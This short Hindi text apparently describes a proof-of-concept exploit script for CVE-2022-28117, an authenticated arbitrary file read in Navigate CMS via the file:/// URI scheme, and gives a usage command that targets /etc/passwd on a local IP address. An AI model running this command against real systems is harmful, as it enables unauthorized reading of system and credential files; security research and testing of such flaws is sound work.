
CVE-2022-28117 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो Navigate CMS में file:/// URI योजना के माध्यम से मनमानी फ़ाइल पढ़ने को सक्षम बनाता है, प्रमाणीकरण समर्थन के साथ।
PoC python थोड़ा संशोधित
उपयोग: python3 .\poccve2022-28117.py -x file:///etc/passwd -u [username] -p [password] http://192.168.148.140/navigate